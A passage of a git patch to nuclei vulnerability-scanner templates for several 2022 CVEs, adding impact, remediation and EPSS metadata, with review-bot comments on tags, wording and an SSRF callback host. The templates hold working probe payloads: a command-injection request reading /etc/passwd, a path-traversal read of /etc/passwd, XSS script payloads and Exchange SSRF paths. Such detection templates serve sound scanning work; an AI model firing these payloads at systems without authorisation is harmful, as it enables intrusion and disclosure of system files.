@@ -41,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a00463044022002d0aafae336d011a0a74b01352143f57a21e65003ac86e0ea9563934522d3c80220494bc3ac1854a6da8d5cc61b7c8b2b0158429cb26e83ab3f628b90e2dfb751a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40881.yaml b/nuclei-templates/CVE-2022/CVE-2022-40881.yaml index bafbfd6b54..929886f5a0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40881.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40881.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | SolarView Compact 6.00 is vulnerable to a command injection via network_test.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarView. reference: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - https://github.com/advisories/GHSA-wx3r-88rg-whxq @@ -15,15 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40881 cwe-id: CWE-77 + epss-score: 0.96169 + epss-percentile: 0.99389 + cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: contec + product: solarview_compact_firmware shodan-query: http.favicon.hash:"-244067125" - verified: "true" - tags: cve,cve2022,solarview,rce,lfi - + tags: cve,cve2022,solarview,rce,lfi,contec variables: cmd: "cat${IFS}/etc/passwd" -requests: +http: - raw: - | POST /network_test.php HTTP/1.1 @@ -42,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100cf7cdba34d65b8edb10f08b9b4c8fe7f62ad2f48374d0ebc15d7f2bfbda8b361022100db8d88fc5035579a5be45602c1ebb9ac2daf06fa12f71eea28888fc63f5242b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
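Review bot: The tags line in the second hunk still carries `lfi` on a template whose cwe-id is CWE-77, whose name says command injection and whose payload is `cat${IFS}/etc/passwd` through network_test.php; the stray tag will pull this template into `-tags lfi` runs and misreport it in tag statistics. Since the line is already being rewritten, make it `tags: cve,cve2022,solarview,rce,contec` plus whatever tag the repository already uses for CWE-77 (I cannot see the convention from here). The raw request and its matchers continue past this hunk.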
diff --git a/nuclei-templates/CVE-2022/CVE-2022-41040.yaml b/nuclei-templates/CVE-2022/CVE-2022-41040.yaml deleted file mode 100644 index de201d9b75..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-41040.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2022-41040 - -info: - name: Microsoft Exchange Server Server-Side Request Forgery Vulnerability - author: Phillipo - severity: high - description: Microsoft Exchange Server Elevation of Privilege Vulnerability. - reference: - - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-41040 - - http://packetstormsecurity.com/files/170066/Microsoft-Exchange-ProxyNotShell-Remote-Code-Execution.html - - https://hackerone.com/reports/1719719 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cwe-id: CWE-918 - cve-id: CVE-2022-41040 - tags: cve,cve2022,kev,microsoft - -http: - - method: GET - path: - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa@{{Host}}?Protocol=Autodiscoverv1" - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell" - - 
"{{BaseURL}}/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell" - - "{{BaseURL}}/autodiscover/autodiscover.json?@{{Host}}/&Email=autodiscover/autodiscover.json%3f@{{Host}}" - redirects: false - matchers: - - type: status - status: - - 404 - - type: word - part: body - words: - - 'IIS Web Core' - matchers-condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-4117.yaml b/nuclei-templates/CVE-2022/CVE-2022-4117.yaml index d531e09ead..c6161c4c1e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4117.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4117.yaml 
@@ -6,19 +6,23 @@ info: severity: critical description: | WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site. remediation: | Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193 - https://wordpress.org/plugins/iws-geo-form-fields/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4117 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4117 cwe-id: CWE-89 - epss-score: 0.03393 - epss-percentile: 0.90397 + epss-score: 0.03413 + epss-percentile: 0.9123 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +30,7 @@ info: vendor: iws-geo-form-fields_project product: iws-geo-form-fields framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project http: - raw: 
@@ -45,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")' condition: and -# digest: 4a0a00473045022034e43c08b36db76e80b59b5a37d45f087ad60b59bab7e3cf1dcb92b3d446ae060221008d9ef12284c8708cd19a3ffe6d77879f7673947d49f3a5caeb2de93d16b31df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220527f8e6fc57bb3c042da2a2145f63f88cab3db7eeb282091c66cf526cd9b36e30220586c5e71de7bd30a22f81171809aba45884a19aea6b85a63181ef2de54f14d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4140.yaml b/nuclei-templates/CVE-2022/CVE-2022-4140.yaml index 48e6f7931f..52b44d19be 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4140.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4140.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can access sensitive files on the server, potentially exposing sensitive information. remediation: Fixed in version 2.8.5. reference: - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7 @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-4140 cwe-id: CWE-552 - epss-score: 0.00869 - epss-percentile: 0.8049 + epss-score: 0.00932 + epss-percentile: 0.82572 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: collne product: welcart_e-commerce framework: wordpress - tags: usc-e-shop,wpscan,cve,cve2022,wp-plugin,wp,wordpress,lfi,unauthenticated + tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne http: - method: GET 
@@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204afe3e9ce34833a9cd4dbe8795cad09e501252d799b76235e1f5c62f72876c64022100f5ce18bdcd994721db26435ff7face9e500f73ea5e1d7df748ae54547aa3fd91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41412.yaml b/nuclei-templates/CVE-2022/CVE-2022-41412.yaml index ca264a6247..5af2d670a0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41412.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-41412.yaml @@ -17,23 +17,21 @@ info: cvss-score: 8.6 cve-id: CVE-2022-41412 cwe-id: CWE-918 - epss-score: 0.0224 - epss-percentile: 0.89541 + epss-score: 0.0012 + epss-percentile: 0.45431 cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 vendor: perfsonar product: perfsonar - fofa-query: - - title="perfSONAR Toolkit" - - title="perfsonar toolkit" + fofa-query: title="perfSONAR Toolkit" + verified: true tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar http: - method: GET path: - - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://{{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" + - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" matchers-condition: and matchers: 
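Review bot: Replacing `{{interactsh-url}}` with the fixed host `http://oast.fun/...` in the CVE-2022-41412 hunk removes the per-scan callback correlation that makes this SSRF check meaningful: nuclei can no longer observe whether the target fetched the URL, and any matcher further down that keys on `interactsh_protocol` or `interactsh_request` (the matchers start in this hunk but are not visible) will never fire. It also makes every scanned perfSONAR host send a request to a domain the tester does not control, which leaks the target list to that server's operator and is hard to justify in an engagement. Unless the intent is to turn this into a plain status/body check, restore `url=http://{{interactsh-url}}/esmond/perfsonar/archive/../../../` and keep `max-request: 1`. The `verified: true` move and the single fofa-query are fine.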
@@ -45,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006a47d11706105ec5ff8bb32f84f5cc23566591377947e1d8f90888a3b028bf702203843cbf5b2bc7b991f92043424c560f048dacc0128451c47d25c1b40528b5034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e598e38759b6d2c7b34ecb326730371101115feee22f2e9a4e8ecf3fdb09f45902204532d257a96dbe274009bfc99b23ace1c08d5824445578aed77faf1654dc813e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41441.yaml b/nuclei-templates/CVE-2022/CVE-2022-41441.yaml index f552c574f9..9f6631c80e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41441.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-41441.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41441 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38742 + epss-score: 0.00155 + epss-percentile: 0.5093 cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: reqlogic product: reqlogic shodan-query: http.html:"ReQlogic" - tags: packetstorm,cve,cve2022,xss,reqlogic + tags: cve,cve2022,packetstorm,xss,reqlogic http: - method: GET 
@@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body_2, "") && contains(body_2, "POProcessTimeout")' condition: and -# digest: 490a0046304402203ce32af4ce5737693b2f500c167f42c8ccc89282a10bd08cb357808fe86aecd602205a3b8a7f3235bbe35766ee870ac75344da0f29dd561d3111a44ad77210f92514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009639948683a1cbabebf7e7ebb27e2e1f72a571fd097c09de93b67ea65d95f021022100f0953cb6c21404e57e03e89f6d3b1956c83911cb12cad4bef5b21c86d957ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41473.yaml b/nuclei-templates/CVE-2022/CVE-2022-41473.yaml index 0f5b7a7393..487d6d487a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41473.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-41473.yaml 
@@ -6,20 +6,33 @@ info: severity: medium description: | RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website. + remediation: | + Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability. reference: - https://github.com/ralap-z/rpcms/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2022-41473 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-41473 cwe-id: CWE-79 + epss-score: 0.012 + epss-percentile: 0.84884 + cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: 'rpcms' + product: 'rpcms' shodan-query: http.html:"RPCMS" - verified: "true" - tags: cve,cve2022,rpcms,xss + tags: cve,cve2022,rpcms,xss,'rpcms' -requests: +http: - method: GET path: - "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -41,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/18 +# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-41840.yaml b/nuclei-templates/CVE-2022/CVE-2022-41840.yaml index d608fd824e..1a11bfefce 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-41840.yaml 
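Review bot: The new tags line in CVE-2022-41473.yaml carries a quoted entry, `tags: cve,cve2022,rpcms,xss,'rpcms'`; the value is a plain YAML scalar, so the quote characters are literal and the engine presumably sees a tag `'rpcms'` that duplicates the existing `rpcms` and will not match a filter for `rpcms`. The same hunk quotes `vendor: 'rpcms'` and `product: 'rpcms'`, which parses fine but differs from every other template touched by this patch. Change the line to `tags: cve,cve2022,rpcms,xss` and drop the quotes on vendor and product.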
+++ b/nuclei-templates/CVE-2022/CVE-2022-41840.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. + remediation: | + Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ @@ -16,29 +20,35 @@ info: cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 + epss-score: 0.00738 + epss-percentile: 0.78774 + cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop + verified: true + max-request: 1 + vendor: collne + product: welcart_e-commerce + framework: wordpress + tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word part: header words: - "application/json" + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a00473045022100f9dea7e19767e917eccb890bdc7a4b6effb2a1942275ba6bd15aa0362dc6b584022008f8c2bd3da536ba3f893eb70585ac286a8fb272343f3bb94fc865f1fceb68fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42094.yaml b/nuclei-templates/CVE-2022/CVE-2022-42094.yaml index f4dabafadb..45ed564efd 100644 
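Review bot: The added remediation in CVE-2022-41840.yaml names a fixed release, `(>=2.7.8)`, that none of the visible references state; the description and the patchstack link only identify 2.7.7 and earlier as vulnerable. Unless that release has been checked against the advisory, the safer wording is `Upgrade the Welcart eCommerce plugin to the latest version or apply the vendor-supplied patch for the LFI vulnerability.` The matcher reorder in the same hunk is behaviour-neutral under `matchers-condition: and`.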
--- a/nuclei-templates/CVE-2022/CVE-2022-42094.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42094.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: @@ -13,20 +15,21 @@ info: - https://github.com/bypazs/CVE-2022-42094 - https://nvd.nist.gov/vuln/detail/CVE-2022-42094 - https://backdropcms.org + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42094 cwe-id: CWE-79 - epss-score: 0.00611 - epss-percentile: 0.76249 + epss-score: 0.0071 + epss-percentile: 0.80039 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: backdropcms product: backdrop - tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive + tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms http: - raw: @@ -166,4 +169,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4b0a00483046022100a9a3fd20f2d2db93f53a2e03ab8524c6e0f878ce8e699cc5cf8e102756756016022100dcabe44334536fd91358220c1265969410cc91ea8a1acafbfd823df166e789a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100833759ad52afd13abc5b49fcd770918213699021dbc4ed1ad7e66372e0f0548302201073403909a88ddab9ad7c88c79479b903f7d8b8dced717e7d8d0e89a6f05b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-42095.yaml b/nuclei-templates/CVE-2022/CVE-2022-42095.yaml index f2a95b3880..0eabac7cfe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42095.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42095.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: @@ -18,15 +20,15 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42095 cwe-id: CWE-79 - epss-score: 0.00344 - epss-percentile: 0.68441 + epss-score: 0.00283 + epss-percentile: 0.65226 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: backdropcms product: backdrop_cms - tags: cve,cve2022,xss,cms,backdrop,authenticated + tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms http: - raw: @@ -82,4 +84,4 @@ http: regex: - 'name="form_token" value="(.*)"' internal: true -# digest: 4a0a00473045022054f1330fffee70de0e8afc83cd7d8a333ba68b48b47fc3f1a170c4d6a7e0278d022100ef93b5e8c8bfaec9b21f30cf239a665708137ee5e9e2acaf21aedf20ea8f4403:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220034fd820495574945439e0f2771b2d730d3e01fc650ba5df79aa66b3e608f66f0220265468d28c9449a6e73199f71f1dc5cbdba0efdb3834a6dc0642156047d88771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42096.yaml b/nuclei-templates/CVE-2022/CVE-2022-42096.yaml index 08a026ecb8..90bb990148 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42096.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42096.yaml 
@@ -18,15 +18,15 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42096 cwe-id: CWE-79 - epss-score: 0.00616 - epss-percentile: 0.76384 + epss-score: 0.00345 + epss-percentile: 0.68611 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: backdropcms product: backdrop_cms - tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive + tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms http: - raw: @@ -187,4 +187,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a004730450220071d5244c3f1f7bfbf8a1631a3b7306263b61f7e39e9fe1aaaa5c7f6d3f54610022100ee7c6e20d6aa229226932bdbf25db6f1e149bc364587fe9ecd846997dac65c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d511f8ca03bfd62c3ce9d4eb61ca34977675265bb516ecfc806a64e8785b81d6022041909cc1f36dc06c223ccc56a5e642045be29cfddd45f69658f28149169cf16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42233.yaml b/nuclei-templates/CVE-2022/CVE-2022-42233.yaml index 8ec9f4476b..bbcead7f84 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42233.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42233.yaml 
@@ -5,22 +5,33 @@ info: author: For3stCo1d severity: critical description: | - Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability. + Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233). reference: - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md - https://nvd.nist.gov/vuln/detail/CVE-2022-42233 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-42233 cwe-id: CWE-287 + epss-score: 0.87277 + epss-percentile: 0.9839 + cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: - fofa-query: product=="Tenda-11N-Wireless-AP" + verified: true + max-request: 1 + vendor: tenda + product: 11n_firmware shodan-query: http.title:"Tenda 11N" - verified: "true" + fofa-query: product=="Tenda-11N-Wireless-AP" tags: cve,cve2022,tenda,auth-bypass,router,iot -requests: +http: - raw: - | GET /index.asp HTTP/1.1 @@ -34,8 +45,8 @@ requests: words: - 'def_wirelesspassword' - 'Tenda 11N' - condition: and case-insensitive: true + condition: and - type: word part: header @@ -45,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100b86e4c63dbaa65f20b84e2935e6d84f986fd943c6f626ad3a2d1b00526ea1d4c022071e2e1880c20e23bb3959dfd91cb4b52727a1129c9cc198ff74b8e5674d0c96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4260.yaml b/nuclei-templates/CVE-2022/CVE-2022-4260.yaml index 2ad71f93c6..0752ba3d76 100644 
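Review bot: The rewritten description in CVE-2022-42233.yaml ends with "in the context of the affected site", which is the project's cross-site-scripting boilerplate; this template covers an authentication bypass on Tenda 11N router firmware, so the sentence should end `... and/or execute unauthorized administrative operations on the affected device.` "can possibly obtain" is also weaker than needed and `could obtain` says the same. The rest of the hunk (CPE, EPSS, `requests:` to `http:`, the moved `condition: and`) is metadata and ordering only.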
--- a/nuclei-templates/CVE-2022/CVE-2022-4260.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4260.yaml @@ -6,21 +6,31 @@ info: severity: medium description: | WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system. + remediation: Fixed in version 1.69.1 reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk - remediation: Fixed in version 1.69.1 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-4260 cwe-id: CWE-79 + epss-score: 0.00092 + epss-percentile: 0.38207 + cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,xss,wp-ban,authenticated,wpscan,cve,cve2022,wordpress,wp + verified: true + max-request: 4 + vendor: wp-ban_project + product: wp-ban + framework: wordpress + tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -30,17 +40,14 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 Host: {{Hostname}} _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes - - | GET / HTTP/1.1 Host: {{Hostname}} @@ -48,8 +55,6 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: @@ -61,10 +66,9 @@ requests: extractors: - type: regex name: nonce - part: body group: 1 regex: - '_wpnonce=([0-9a-z]+)' internal: true - -# Enhanced by md on 2023/01/06 + part: body +# digest: 4a0a00473045022054e0cb92b1de30b9a6096c941364f4ef3dd2f229205099d8588224ea2f58f6c7022100ff925bcaa75297254f5780ad4137c14bd3e834a259440ea032f8b9a86bfc8fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 